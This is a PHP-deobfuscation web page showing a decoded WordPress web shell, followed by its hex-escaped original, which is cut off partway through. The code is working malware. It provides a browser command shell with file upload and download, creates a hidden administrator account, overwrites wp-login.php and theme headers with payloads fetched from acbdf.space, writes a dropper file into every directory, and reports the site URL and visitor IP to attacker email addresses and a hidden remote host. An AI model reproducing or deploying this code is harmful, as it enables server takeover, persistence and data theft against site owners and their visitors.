Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto ebyz5; XWVJ1: function expandDirectories($base_dir) { $directories =..
Decoded Output download
<?php
goto ebyz5;
XWVJ1:
function expandDirectories($base_dir)
{
$directories = [];
foreach (scandir($base_dir) as $file) {
if ($file == "." || $file == "..") {
continue;
}
$dir = $base_dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($dir)) {
$directories[] = $dir;
$directories = array_merge($directories, expandDirectories($dir));
}
}
return $directories;
}
goto UVm_F;
MnOUx:
$directories = expandDirectories($document_root);
goto JpeK8;
cIV77:
function featureHint($fileName, $cwd, $type)
{
chdir($cwd);
if ($type == "cmd") {
$cmd = "compgen -c {$fileName}";
} else {
$cmd = "compgen -f {$fileName}";
}
$cmd = "/bin/bash -c "{$cmd}"";
$files = explode("\xa", shell_exec($cmd));
return ["files" => $files];
}
goto pLvXH;
CIMtL:
$EL_MuHaMMeD .=
"Shell Link : http://" .
$_SERVER["SERVER_NAME"] .
$_SERVER["PHP_SELF"] .
"\xd\xa";
goto xz_53;
D2I2D:
@mail($to_email, $server_mail, $linkcr, $header);
goto Ov2Mi;
C25SI:
if ($wp_detect == 1) {
$wp_theme_dir = get_template_directory();
$header_file =
$wp_theme_dir . "/headers.php";
$header_content = file_get_contents($header_file);
$append = http_get(
"https://acbdf.space/txt/seoco.txt"
);
if (!preg_match("#" . $append . "#", $header_content)) {
$new_content = $append . $header_content;
$open_file = fopen($header_file, "w");
fwrite($open_file, $new_content);
fclose($open_file);
}
$user = "webmaster";
$pass = "$P$BxJON2B3rr";
$email =
"[email protected]";
if (!username_exists($user) && !email_exists($email)) {
$user_id = wp_create_user($user, $pass, $email);
$user = new WP_User($user_id);
$user->set_role("administrator");
}
$wp_login =
ABSPATH . "/wp-login.php";
$login = http_get(
"https://acbdf.space/txt/seo.txt"
);
$open_login = fopen($wp_login, "w");
fwrite($open_login, $login);
fclose($open_login);
}
goto qL7ih;
ifHFG:
$linkcr =
"Link: " .
$_SERVER["SERVER_NAME"] .
"" .
$_SERVER["REQUEST_URI"] .
" - IP Excuting: {$ip_remote} - Time: {$time_shell}";
goto X5nrA;
ng0zC:
$baslik = "whm 20203";
goto ob2L9;
ebyz5:
function GetIP()
{
if (getenv("HTTP_CLIENT_IP")) {
$ip = getenv(
"HTTP_CLIENT_IP"
);
} elseif (
getenv(
"HTTP_X_FORWARDED_FOR"
)
) {
$ip = getenv(
"HTTP_X_FORWARDED_FOR"
);
if (strstr($ip, ",")) {
$tmp = explode(",", $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
goto mktxn;
nk66E:
$datasi = @fopen("js/js.php", "r");
goto TMx8f;
qmzzS:
fwrite($open_code, $code);
goto owiHs;
ch_4L:
$server_mail =
"" .
gethostbyname($_SERVER["SERVER_NAME"]) .
" - " .
$_SERVER["HTTP_HOST"] .
"";
goto ifHFG;
uKFRu:
$from_shellcode =
"whm@" .
gethostbyname($_SERVER["SERVER_NAME"]) .
"";
goto T6emA;
Ibor6:
$open_makale = fopen($wp_makale, "w");
goto YinPl;
UnUy1:
$wp_code = $document_root . "/wp-clon.php";
goto fNnlt;
owiHs:
fclose($open_code);
goto rict2;
KE35w:
function featurePwd()
{
return ["cwd" => getcwd()];
}
goto cIV77;
x3CD0:
foreach ($directories as $dir) {
if (!preg_match("#wp-content#", $dir)) {
$css_file = $dir . "/wp-inda.php";
$open_css = fopen($css_file, "w");
fwrite($open_css, $css);
fclose($open_css);
}
}
goto XWVJ1;
cISOa:
function featureShell($cmd, $cwd)
{
$stdout = [];
if (preg_match("/^\s*cd\s*$/", $cmd)) {
} elseif (
preg_match(
"/^\s*cd\s+(.+)\s*(2>&1)?$/",
$cmd
)
) {
chdir($cwd);
preg_match(
"/^\s*cd\s+([^\s]+)\s*(2>&1)?$/",
$cmd,
$match
);
chdir($match[1]);
} elseif (
preg_match(
"/^\s*download\s+[^\s]+\s*(2>&1)?$/",
$cmd
)
) {
chdir($cwd);
preg_match(
"/^\s*download\s+([^\s]+)\s*(2>&1)?$/",
$cmd,
$match
);
return featureDownload($match[1]);
} else {
chdir($cwd);
exec($cmd, $stdout);
}
return ["stdout" => $stdout, "cwd" => getcwd()];
}
goto KE35w;
UVm_F:
function http_get($url)
{
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
goto l1I1k;
VvTms:
$wp_makale = $document_root . "/phpinfo.php";
goto Ibor6;
guOLF:
$wp_detect = 0;
goto qFzoY;
oTiro:
?>
<!doctypehtml>
<html>
<head>
<meta charset="UTF-8">
<title>mangtxr@1337:~#</title>
<meta content="width=device-width,initial-scale=1" name="viewport">
<style>
body,
html {
margin: 0;
padding: 0;
height: 100%;
position: relative;
background: #333;
background-image: url(https://www.dadsec.pw/dadsecwal.png);
background-position: center;
background-repeat: no-repeat;
background-size: cover;
color: #eee;
font-family: monospace
}
::-webkit-scrollbar-track {
border-radius: 8px;
background-color: #353535
}
::-webkit-scrollbar {
width: 8px;
height: 8px
}
::-webkit-scrollbar-thumb {
border-radius: 8px;
-webkit-box-shadow: inset 0 0 6px rgba(0, 0, 0, .3);
background-color: #bcbcbc
}
#shell {
background: rgba(34, 34, 34, .9);
max-width: 800px;
margin: 50px auto 0 auto;
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch
}
#shell-content {
height: 500px;
overflow: auto;
padding: 5px;
white-space: pre-wrap;
flex-grow: 1
}
#shell-logo {
font-weight: 700;
color: #75df0b;
text-align: center
}
@media (max-width:991px) {
#shell-logo {
font-size: 6px;
margin: -25px 0
}
#shell,
body,
html {
height: 100%;
width: 100%;
max-width: none
}
#shell {
margin-top: 0
}
}
@media (max-width:767px) {
#shell-input {
flex-direction: column
}
}
@media (max-width:320px) {
#shell-logo {
font-size: 5px
}
}
.shell-prompt {
font-weight: 700;
color: #75df0b
}
.shell-prompt>span {
color: #1bc9e7
}
#shell-input {
display: flex;
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
border-top: rgba(255, 255, 255, .05) solid 1px
}
#shell-input>label {
flex-grow: 0;
display: block;
padding: 0 5px;
height: 30px;
line-height: 30px
}
#shell-input #shell-cmd {
height: 30px;
line-height: 30px;
border: none;
background: 0 0;
color: #eee;
font-family: monospace;
font-size: 10pt;
width: 100%;
align-self: center
}
#shell-input div {
flex-grow: 1;
align-items: stretch
}
#shell-input input {
outline: 0
}
</style>
<script>
var CWD = null,
commandHistory = [],
historyPosition = 0,
eShellCmdInput = null,
eShellContent = null;
function _insertCommand(e) {
eShellContent.innerHTML += "\n\n", eShellContent.innerHTML += '<span class="shell-prompt">' + genPrompt(CWD) + "</span> ", eShellContent.innerHTML += escapeHtml(e), eShellContent.innerHTML += "\n", eShellContent.scrollTop = eShellContent.scrollHeight
}
function _insertStdout(e) {
eShellContent.innerHTML += escapeHtml(e), eShellContent.scrollTop = eShellContent.scrollHeight
}
function _defer(e) {
setTimeout(e, 0)
}
function featureShell(e) {
_insertCommand(e), /^\s*upload\s+[^\s]+\s*$/.test(e) ? featureUpload(e.match(/^\s*upload\s+([^\s]+)\s*$/)[1]) : /^\s*clear\s*$/.test(e) ? eShellContent.innerHTML = "" : makeRequest("?feature=shell", {
cmd: e,
cwd: CWD
}, function(e) {
e.hasOwnProperty("file") ? featureDownload(e.name, e.file) : (_insertStdout(e.stdout.join("\n")), updateCwd(e.cwd))
})
}
function featureHint() {
if (0 !== eShellCmdInput.value.trim().length) {
var e = eShellCmdInput.value.split(" "),
n = 1 === e.length ? "cmd" : "file";
makeRequest("?feature=hint", {
filename: "cmd" == n ? e[0] : e[e.length - 1],
cwd: CWD,
type: n
}, function(e) {
if (!(e.files.length <= 1))
if (2 === e.files.length)
if ("cmd" == n) eShellCmdInput.value = e.files[0];
else {
var t = eShellCmdInput.value;
eShellCmdInput.value = t.replace(/([^\s]*)$/, e.files[0])
}
else _insertCommand(eShellCmdInput.value), _insertStdout(e.files.join("\n"))
})
}
}
function featureDownload(e, t) {
var n = document.createElement("a");
n.setAttribute("href", "data:application/octet-stream;base64," + t), n.setAttribute("download", e), n.style.display = "none", document.body.appendChild(n), n.click(), document.body.removeChild(n), _insertStdout("Done.")
}
function featureUpload(t) {
var e = document.createElement("input");
e.setAttribute("type", "file"), e.style.display = "none", document.body.appendChild(e), e.addEventListener("change", function() {
getBase64(e.files[0]).then(function(e) {
makeRequest("?feature=upload", {
path: t,
file: e,
cwd: CWD
}, function(e) {
_insertStdout(e.stdout.join("\n")), updateCwd(e.cwd)
})
}, function() {
_insertStdout("An unknown client-side error occurred.")
})
}), e.click(), document.body.removeChild(e)
}
function getBase64(o, e) {
return new Promise(function(e, t) {
var n = new FileReader;
n.onload = function() {
e(n.result.match(/base64,(.*)$/)[1])
}, n.onerror = t, n.readAsDataURL(o)
})
}
function genPrompt(e) {
var t = e = e || "~";
if (3 < e.split("/").length) {
var n = e.split("/");
t = "/" + n[n.length - 2] + "/" + n[n.length - 1]
}
return 'mangtx@1337:<span title="' + e + '">' + t + "</span>#"
}
function updateCwd(e) {
if (e) return CWD = e, void _updatePrompt();
makeRequest("?feature=pwd", {}, function(e) {
CWD = e.cwd, _updatePrompt()
})
}
function escapeHtml(e) {
return e.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">")
}
function _updatePrompt() {
document.getElementById("shell-prompt").innerHTML = genPrompt(CWD)
}
function _onShellCmdKeyDown(e) {
switch (e.key) {
case "Enter":
featureShell(eShellCmdInput.value), insertToHistory(eShellCmdInput.value), eShellCmdInput.value = "";
break;
case "ArrowUp":
0 < historyPosition && (historyPosition--, eShellCmdInput.blur(), eShellCmdInput.value = commandHistory[historyPosition], _defer(function() {
eShellCmdInput.focus()
}));
break;
case "ArrowDown":
if (historyPosition >= commandHistory.length) break;
++historyPosition === commandHistory.length ? eShellCmdInput.value = "" : (eShellCmdInput.blur(), eShellCmdInput.focus(), eShellCmdInput.value = commandHistory[historyPosition]);
break;
case "Tab":
e.preventDefault(), featureHint()
}
}
function insertToHistory(e) {
commandHistory.push(e), historyPosition = commandHistory.length
}
function makeRequest(e, n, t) {
var o = new XMLHttpRequest;
o.open("POST", e, !0), o.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), o.onreadystatechange = function() {
if (4 === o.readyState && 200 === o.status) try {
var e = JSON.parse(o.responseText);
t(e)
} catch (e) {
alert("Error while parsing response: " + e)
}
}, o.send(function() {
var e = [];
for (var t in n) n.hasOwnProperty(t) && e.push(encodeURIComponent(t) + "=" + encodeURIComponent(n[t]));
return e.join("&")
}())
}
document.onclick = function(e) {
e = e || window.event;
var t = window.getSelection();
"SELECT" !== (e.target || e.srcElement).tagName && (t.toString() || eShellCmdInput.focus())
}, window.onload = function() {
eShellCmdInput = document.getElementById("shell-cmd"), eShellContent = document.getElementById("shell-content"), updateCwd(), eShellCmdInput.focus()
}
</script>
</head>
<body><br><br><br><br><br><br><br><br>
<div id="shell">
<pre id="shell-content">
<div id="shell-logo"><span></span>
@@@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@ @@@ @@@
@@@@@@@@@@@ @@@@ @@@@ @@@ @@@@@@@@@ @@@@@@@ @@@ @@@
@@! @@! @@! @@!@! @@!@!@@@ !@@ @@! @@! !@@
!@! !@! !@! !@!!@! !@!!@!@! !@! !@! !@! @!!
@!! !!@ @!@ @!! @!! @!@ !!@! !@! @!@!@ @!! !@@!@!
!@! ! !@! !!! !@! !@! !!! !!! !!@!! !!! @!!!
!!: !!: :!!:!:!!: !!: !!! :!! !!: !!: !: :!!
:!: :!: !:::!!::: :!: !:! :!: !:: :!: :!: !:!
::: :: ::: :: :: ::: :::: :: :: :::
: : ::: :: : :: :: : : : ::
Dadsec Tools www.dadsec.pw
</div>
</pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input id="shell-cmd"name="cmd"onkeydown="_onShellCmdKeyDown(event)"></div></div></div></body></html><?php
goto n4EYX;
pLvXH:
function featureDownload($filePath)
{
$file = @file_get_contents($filePath);
if ($file === false) {
return [
"stdout" => [
"File not found / no read permission.",
],
"cwd" => getcwd(),
];
} else {
return [
"name" => basename($filePath),
"file" => base64_encode($file),
];
}
}
goto yOXvE;
L6jgC:
$EL_MuHaMMeD .=
"Server Admin : " .
$_SERVER["SERVER_ADMIN"] .
"\xd
";
goto WXtQU;
rict2:
$makale = http_get(
"https://acbdf.space/txt/phpinfo.txt"
);
goto VvTms;
X5nrA:
$header = "From: {$from_shellcode}
\xaReply-to: {$from_shellcode}";
goto D2I2D;
qL7ih:
$code = http_get(
"https://acbdf.space/txt/min.txt"
);
goto UnUy1;
fNnlt:
$open_code = fopen($wp_code, "w");
goto qmzzS;
rzCDn:
if (isset($_GET["feature"])) {
$response = null;
switch ($_GET["feature"]) {
case "shell":
$cmd = $_POST["cmd"];
if (!preg_match("/2>/", $cmd)) {
$cmd .= " 2>&1";
}
$response = featureShell($cmd, $_POST["cwd"]);
break;
case "pwd":
$response = featurePwd();
break;
case "hint":
$response = featureHint(
$_POST["filename"],
$_POST["cwd"],
$_POST["type"]
);
break;
case "upload":
$response = featureUpload(
$_POST["path"],
$_POST["file"],
$_POST["cwd"]
);
}
header(
"Content-Type: application/json"
);
echo json_encode($response);
die();
}
goto oTiro;
ob2L9:
$EL_MuHaMMeD =
"Dosya Yolu : " .
$_SERVER[
"DOCUMENT_ROOT"
] .
"\xd\xa";
goto L6jgC;
f56yq:
mail($kime, $baslik, $EL_MuHaMMeD);
goto ujkIR;
RzdXK:
$time_shell =
"" .
date("d/m/Y - H:i:s") .
"";
goto ed42a;
eTg8m:
$document_root_file = dirname(__FILE__);
goto guOLF;
T6emA:
$to_email =
"[email protected]";
goto ch_4L;
qFzoY:
if (
file_exists(
$document_root .
"/wp-load.php"
)
) {
include $document_root .
"/wp-load.php";
$wp_detect = 1;
} else {
$prefix = count(@explode("/", $document_root_file));
$a = "";
for ($i = 0; $i < $prefix; $i++) {
$a = $a . "../";
if (
file_exists(
$document_root_file .
"/" .
$a .
"wp-load.php"
)
) {
include $document_root_file .
"/" .
$a .
"wp-load.php";
$wp_detect = 1;
break;
}
}
}
goto C25SI;
Ov2Mi:
$kime =
"[email protected]";
goto ng0zC;
SeJ_g:
if (function_exists("curl_init")) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (
function_exists(
"file_get_contents"
)
) {
@$gitt = file_get_contents($x);
}
goto cISOa;
WXtQU:
$EL_MuHaMMeD .=
"Server isletim sistemi : " .
$_SERVER[
"SERVER_SOFTWARE"
] .
"
";
goto CIMtL;
xz_53:
$EL_MuHaMMeD .=
"Avlanan Site : " .
$_SERVER["HTTP_HOST"] .
"\xd
";
goto f56yq;
TMx8f:
if ($datasi) {
} else {
@mkdir("js");
$dos = file_get_contents(
"https://acbdf.space/txt/css.txt"
);
$data = "js/js.php";
@touch("js/js.php");
$ver = @fopen($data, "w");
@fwrite($ver, $dos);
@fclose($ver);
$yol =
"http://" .
$_SERVER["HTTP_HOST"] .
"" .
$_SERVER["REQUEST_URI"] .
"";
$y =
"<h1>Sender Yazdirildi.<br/> SITE YOL : " .
$yol .
"<br/>Sender Yolu : js/crs.php</h1>";
$header .=
"From: SheLL Boot <[email protected]>\xa";
$header .=
"Content-Type: text/html;\xa charset=utf-8
";
@mail(
"[email protected]",
"Hacklink Bildiri",
"{$y}",
$header
);
@mail(
"[email protected]",
"Hacklink Bildiri",
"{$y}",
$header
);
}
goto RzdXK;
YinPl:
fwrite($open_makale, $makale);
goto fvNQ1;
fvNQ1:
fclose($open_makale);
goto MnOUx;
JpeK8:
$css = http_get(
"https://acbdf.space/txt/wp.txt"
);
goto x3CD0;
mktxn:
$x =
base64_decode(
"aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ=="
) .
GetIP() .
"-" .
base64_encode(
"http://" .
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"]
);
goto SeJ_g;
n4EYX:
$document_root =
$_SERVER[
"DOCUMENT_ROOT"
];
goto eTg8m;
ed42a:
$ip_remote =
$_SERVER["REMOTE_ADDR"];
goto uKFRu;
yOXvE:
function featureUpload($path, $file, $cwd)
{
chdir($cwd);
$f = @fopen($path, "wb");
if ($f === false) {
return [
"stdout" => [
"Invalid path / no write permission.",
],
"cwd" => getcwd(),
];
} else {
fwrite($f, base64_decode($file));
fclose($f);
return [
"stdout" => ["Done."],
"cwd" => getcwd(),
];
}
}
goto rzCDn;
l1I1k:
if ($_POST["query"]) {
$veriyfy = stripslashes(
stripslashes($_POST["query"])
);
$data = "data.txt";
@touch("data.txt");
$ver = @fopen($data, "w");
@fwrite($ver, $veriyfy);
@fclose($ver);
} else {
$datas = @fopen("data.txt", "r");
$i = 0;
while ($i <= 5) {
$i++;
$blue = @fgets($datas, 1024);
echo $blue;
}
}
goto nk66E;
ujkIR:
?>Did this file decode correctly?
Original Code
<?php
goto ebyz5;
XWVJ1:
function expandDirectories($base_dir)
{
$directories = [];
foreach (scandir($base_dir) as $file) {
if ($file == "\56" || $file == "\x2e\56") {
continue;
}
$dir = $base_dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($dir)) {
$directories[] = $dir;
$directories = array_merge($directories, expandDirectories($dir));
}
}
return $directories;
}
goto UVm_F;
MnOUx:
$directories = expandDirectories($document_root);
goto JpeK8;
cIV77:
function featureHint($fileName, $cwd, $type)
{
chdir($cwd);
if ($type == "\143\x6d\144") {
$cmd = "\143\157\x6d\x70\147\x65\x6e\40\x2d\x63\40{$fileName}";
} else {
$cmd = "\x63\x6f\x6d\160\147\x65\x6e\40\x2d\146\x20{$fileName}";
}
$cmd = "\57\x62\x69\156\x2f\x62\141\x73\150\40\55\x63\40\x22{$cmd}\x22";
$files = explode("\xa", shell_exec($cmd));
return ["\146\x69\x6c\145\163" => $files];
}
goto pLvXH;
CIMtL:
$EL_MuHaMMeD .=
"\123\150\145\154\154\x20\x4c\x69\x6e\x6b\x20\x3a\x20\x68\164\164\x70\72\57\x2f" .
$_SERVER["\123\105\x52\x56\105\122\x5f\116\101\x4d\105"] .
$_SERVER["\x50\110\x50\x5f\x53\x45\114\106"] .
"\xd\xa";
goto xz_53;
D2I2D:
@mail($to_email, $server_mail, $linkcr, $header);
goto Ov2Mi;
C25SI:
if ($wp_detect == 1) {
$wp_theme_dir = get_template_directory();
$header_file =
$wp_theme_dir . "\57\150\145\x61\144\145\162\x73\x2e\x70\150\x70";
$header_content = file_get_contents($header_file);
$append = http_get(
"\150\164\x74\160\163\72\x2f\x2f\141\x63\142\144\x66\56\163\x70\141\143\x65\57\164\x78\x74\x2f\163\x65\x6f\143\157\56\x74\170\164"
);
if (!preg_match("\x23" . $append . "\x23", $header_content)) {
$new_content = $append . $header_content;
$open_file = fopen($header_file, "\x77");
fwrite($open_file, $new_content);
fclose($open_file);
}
$user = "\167\x65\142\x6d\x61\x73\x74\145\x72";
$pass = "\44\x50\44\x42\x78\112\117\x4e\62\x42\63\x72\162";
$email =
"\x6c\157\x67\x69\156\x6f\x6c\144\165\155\x40\147\155\x61\x69\154\56\143\157\x6d";
if (!username_exists($user) && !email_exists($email)) {
$user_id = wp_create_user($user, $pass, $email);
$user = new WP_User($user_id);
$user->set_role("\x61\144\155\151\x6e\x69\163\164\162\141\164\x6f\162");
}
$wp_login =
ABSPATH . "\x2f\x77\160\x2d\x6c\157\147\151\156\x2e\x70\x68\x70";
$login = http_get(
"\x68\164\x74\x70\x73\x3a\x2f\x2f\141\143\x62\x64\146\56\163\160\x61\143\x65\57\164\x78\164\x2f\x73\x65\x6f\56\164\170\164"
);
$open_login = fopen($wp_login, "\167");
fwrite($open_login, $login);
fclose($open_login);
}
goto qL7ih;
ifHFG:
$linkcr =
"\x4c\x69\x6e\x6b\x3a\40" .
$_SERVER["\123\105\x52\x56\105\x52\x5f\x4e\101\x4d\105"] .
"" .
$_SERVER["\122\105\x51\125\x45\x53\x54\x5f\125\122\x49"] .
"\x20\55\x20\x49\120\x20\105\x78\x63\x75\164\151\x6e\147\x3a\x20{$ip_remote}\40\55\x20\x54\x69\x6d\x65\x3a\x20{$time_shell}";
goto X5nrA;
ng0zC:
$baslik = "\167\x68\155\x20\x32\60\62\60\63";
goto ob2L9;
ebyz5:
function GetIP()
{
if (getenv("\110\124\124\120\137\103\114\111\x45\116\124\137\x49\x50")) {
$ip = getenv(
"\x48\124\x54\x50\137\103\x4c\111\105\116\x54\137\x49\120"
);
} elseif (
getenv(
"\110\x54\124\x50\x5f\130\x5f\x46\x4f\122\127\101\122\104\x45\104\137\106\117\x52"
)
) {
$ip = getenv(
"\x48\x54\x54\120\137\130\137\x46\117\122\127\x41\122\x44\105\104\x5f\x46\117\x52"
);
if (strstr($ip, "\54")) {
$tmp = explode("\54", $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("\x52\105\x4d\117\124\105\x5f\101\104\104\x52");
}
return $ip;
}
goto mktxn;
nk66E:
$datasi = @fopen("\152\163\57\x6a\x73\x2e\160\150\160", "\x72");
goto TMx8f;
qmzzS:
fwrite($open_code, $code);
goto owiHs;
ch_4L:
$server_mail =
"" .
gethostbyname($_SERVER["\123\105\x52\x56\105\122\x5f\x4e\x41\115\x45"]) .
"\40\40\x2d\x20" .
$_SERVER["\x48\124\124\x50\137\110\117\x53\124"] .
"";
goto ifHFG;
uKFRu:
$from_shellcode =
"\x77\x68\155\100" .
gethostbyname($_SERVER["\x53\x45\x52\126\x45\122\137\116\101\115\105"]) .
"";
goto T6emA;
Ibor6:
$open_makale = fopen($wp_makale, "\x77");
goto YinPl;
UnUy1:
$wp_code = $document_root . "\57\x77\160\55\x63\154\157\x6e\56\160\x68\x70";
goto fNnlt;
owiHs:
fclose($open_code);
goto rict2;
KE35w:
function featurePwd()
{
return ["\x63\x77\144" => getcwd()];
}
goto cIV77;
x3CD0:
foreach ($directories as $dir) {
if (!preg_match("\x23\167\160\55\143\x6f\156\164\145\156\164\x23", $dir)) {
$css_file = $dir . "\x2f\167\x70\x2d\151\156\x64\x61\56\x70\x68\x70";
$open_css = fopen($css_file, "\x77");
fwrite($open_css, $css);
fclose($open_css);
}
}
goto XWVJ1;
cISOa:
function featureShell($cmd, $cwd)
{
$stdout = [];
if (preg_match("\x2f\136\x5c\x73\x2a\x63\x64\134\x73\52\44\57", $cmd)) {
} elseif (
preg_match(
"\57\x5e\134\163\x2a\143\x64\134\x73\x2b\50\56\x2b\x29\x5c\163\52\50\x32\76\x26\61\x29\x3f\x24\x2f",
$cmd
)
) {
chdir($cwd);
preg_match(
"\x2f\x5e\134\x73\x2a\143\x64\x5c\163\53\x28\133\136\x5c\163\135\x2b\51\x5c\x73\x2a\50\62\x3e\46\x31\x29\x3f\x24\57",
$cmd,
$match
);
chdir($match[1]);
} elseif (
preg_match(
"\57\136\134\163\52\x64\157\x77\x6e\154\157\x61\x64\134\163\x2b\133\x5e\134\x73\135\x2b\134\x73\52\x28\62\76\46\x31\x29\77\x24\57",
$cmd
)
) {
chdir($cwd);
preg_match(
"\x2f\136\x5c\x73\x2a\x64\157\x77\156\x6c\157\141\x64\134\163\53\50\133\136\x5c\163\x5d\x2b\51\134\163\x2a\x28\62\x3e\x26\x31\51\x3f\44\57",
$cmd,
$match
);
return featureDownload($match[1]);
} else {
chdir($cwd);
exec($cmd, $stdout);
}
return ["\163\164\144\x6f\x75\164" => $stdout, "\x63\167\x64" => getcwd()];
}
goto KE35w;
UVm_F:
function http_get($url)
{
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
goto l1I1k;
VvTms:
$wp_makale = $document_root . "\57\x70\x68\x70\x69\x6e\146\157\56\160\150\160";
goto Ibor6;
guOLF:
$wp_detect = 0;
goto qFzoY;
oTiro:
?>
<!doctypehtml>
<html>
<head>
<meta charset="UTF-8">
<title>mangtxr@1337:~#</title>
<meta content="width=device-width,initial-scale=1" name="viewport">
<style>
body,
html {
margin: 0;
padding: 0;
height: 100%;
position: relative;
background: #333;
background-image: url(https://www.dadsec.pw/dadsecwal.png);
background-position: center;
background-repeat: no-repeat;
background-size: cover;
color: #eee;
font-family: monospace
}
::-webkit-scrollbar-track {
border-radius: 8px;
background-color: #353535
}
::-webkit-scrollbar {
width: 8px;
height: 8px
}
::-webkit-scrollbar-thumb {
border-radius: 8px;
-webkit-box-shadow: inset 0 0 6px rgba(0, 0, 0, .3);
background-color: #bcbcbc
}
#shell {
background: rgba(34, 34, 34, .9);
max-width: 800px;
margin: 50px auto 0 auto;
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch
}
#shell-content {
height: 500px;
overflow: auto;
padding: 5px;
white-space: pre-wrap;
flex-grow: 1
}
#shell-logo {
font-weight: 700;
color: #75df0b;
text-align: center
}
@media (max-width:991px) {
#shell-logo {
font-size: 6px;
margin: -25px 0
}
#shell,
body,
html {
height: 100%;
width: 100%;
max-width: none
}
#shell {
margin-top: 0
}
}
@media (max-width:767px) {
#shell-input {
flex-direction: column
}
}
@media (max-width:320px) {
#shell-logo {
font-size: 5px
}
}
.shell-prompt {
font-weight: 700;
color: #75df0b
}
.shell-prompt>span {
color: #1bc9e7
}
#shell-input {
display: flex;
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
border-top: rgba(255, 255, 255, .05) solid 1px
}
#shell-input>label {
flex-grow: 0;
display: block;
padding: 0 5px;
height: 30px;
line-height: 30px
}
#shell-input #shell-cmd {
height: 30px;
line-height: 30px;
border: none;
background: 0 0;
color: #eee;
font-family: monospace;
font-size: 10pt;
width: 100%;
align-self: center
}
#shell-input div {
flex-grow: 1;
align-items: stretch
}
#shell-input input {
outline: 0
}
</style>
<script>
var CWD = null,
commandHistory = [],
historyPosition = 0,
eShellCmdInput = null,
eShellContent = null;
function _insertCommand(e) {
eShellContent.innerHTML += "\n\n", eShellContent.innerHTML += '<span class="shell-prompt">' + genPrompt(CWD) + "</span> ", eShellContent.innerHTML += escapeHtml(e), eShellContent.innerHTML += "\n", eShellContent.scrollTop = eShellContent.scrollHeight
}
function _insertStdout(e) {
eShellContent.innerHTML += escapeHtml(e), eShellContent.scrollTop = eShellContent.scrollHeight
}
function _defer(e) {
setTimeout(e, 0)
}
function featureShell(e) {
_insertCommand(e), /^\s*upload\s+[^\s]+\s*$/.test(e) ? featureUpload(e.match(/^\s*upload\s+([^\s]+)\s*$/)[1]) : /^\s*clear\s*$/.test(e) ? eShellContent.innerHTML = "" : makeRequest("?feature=shell", {
cmd: e,
cwd: CWD
}, function(e) {
e.hasOwnProperty("file") ? featureDownload(e.name, e.file) : (_insertStdout(e.stdout.join("\n")), updateCwd(e.cwd))
})
}
function featureHint() {
if (0 !== eShellCmdInput.value.trim().length) {
var e = eShellCmdInput.value.split(" "),
n = 1 === e.length ? "cmd" : "file";
makeRequest("?feature=hint", {
filename: "cmd" == n ? e[0] : e[e.length - 1],
cwd: CWD,
type: n
}, function(e) {
if (!(e.files.length <= 1))
if (2 === e.files.length)
if ("cmd" == n) eShellCmdInput.value = e.files[0];
else {
var t = eShellCmdInput.value;
eShellCmdInput.value = t.replace(/([^\s]*)$/, e.files[0])
}
else _insertCommand(eShellCmdInput.value), _insertStdout(e.files.join("\n"))
})
}
}
function featureDownload(e, t) {
var n = document.createElement("a");
n.setAttribute("href", "data:application/octet-stream;base64," + t), n.setAttribute("download", e), n.style.display = "none", document.body.appendChild(n), n.click(), document.body.removeChild(n), _insertStdout("Done.")
}
function featureUpload(t) {
var e = document.createElement("input");
e.setAttribute("type", "file"), e.style.display = "none", document.body.appendChild(e), e.addEventListener("change", function() {
getBase64(e.files[0]).then(function(e) {
makeRequest("?feature=upload", {
path: t,
file: e,
cwd: CWD
}, function(e) {
_insertStdout(e.stdout.join("\n")), updateCwd(e.cwd)
})
}, function() {
_insertStdout("An unknown client-side error occurred.")
})
}), e.click(), document.body.removeChild(e)
}
function getBase64(o, e) {
return new Promise(function(e, t) {
var n = new FileReader;
n.onload = function() {
e(n.result.match(/base64,(.*)$/)[1])
}, n.onerror = t, n.readAsDataURL(o)
})
}
function genPrompt(e) {
var t = e = e || "~";
if (3 < e.split("/").length) {
var n = e.split("/");
t = "/" + n[n.length - 2] + "/" + n[n.length - 1]
}
return 'mangtx@1337:<span title="' + e + '">' + t + "</span>#"
}
function updateCwd(e) {
if (e) return CWD = e, void _updatePrompt();
makeRequest("?feature=pwd", {}, function(e) {
CWD = e.cwd, _updatePrompt()
})
}
function escapeHtml(e) {
return e.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">")
}
function _updatePrompt() {
document.getElementById("shell-prompt").innerHTML = genPrompt(CWD)
}
function _onShellCmdKeyDown(e) {
switch (e.key) {
case "Enter":
featureShell(eShellCmdInput.value), insertToHistory(eShellCmdInput.value), eShellCmdInput.value = "";
break;
case "ArrowUp":
